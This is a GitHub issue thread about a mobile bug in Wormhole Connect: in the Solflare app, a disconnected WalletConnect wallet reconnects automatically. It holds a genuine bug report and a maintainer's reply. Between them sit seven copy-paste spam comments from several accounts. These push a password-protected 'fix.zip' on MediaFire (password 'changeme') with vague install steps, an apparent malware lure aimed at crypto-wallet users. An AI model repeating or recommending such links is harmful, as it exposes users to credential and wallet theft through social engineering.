### ISSUE TITLE
[QA] [Mobile, Solflare app] Cannot change WalletConnect wallet

### ISSUE THREAD

**Issue by tsadovska** [wormhole-foundation/wormhole-connect#2434]
## Describe the current behavior in detail
Checked on https://wormhole-connect-mainnet.netlify.app/ with iPhone 11 Pro 17.5.1 and Solflare app Version 1.46.3. 

Steps:
1. Open https://wormhole-connect-mainnet.netlify.app/ in Solflare app
2. Select BSC network and BNB asset in From section
3. Connect MetaMask wallet via WalletConnect
4. Click on dropdown menu and select "Disconnect" option
5. Click on "Connect" button

Actual result: Wallet is automatically reconnected.
Expected result: WalletConnect pop-up is displayed. User can select a different wallet. 

## Notes/ Attachments

https://github.com/user-attachments/assets/53b26542-d6fd-420a-88e2-c2aaf7b7d41e

Scenario is not reproducible with Google Chrome. 

https://github.com/user-attachments/assets/a5a7bf12-fc08-4faa-bbd1-ab7e239f94d2

**Comment by uno-zero** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by uno-zero** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by enricozao** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by emreboga** [comment]
Connect redesign hasn't been tested in mobile yet. I think we can include mobile testing in our bug bash. Adding @Wesleyleung for visibility.
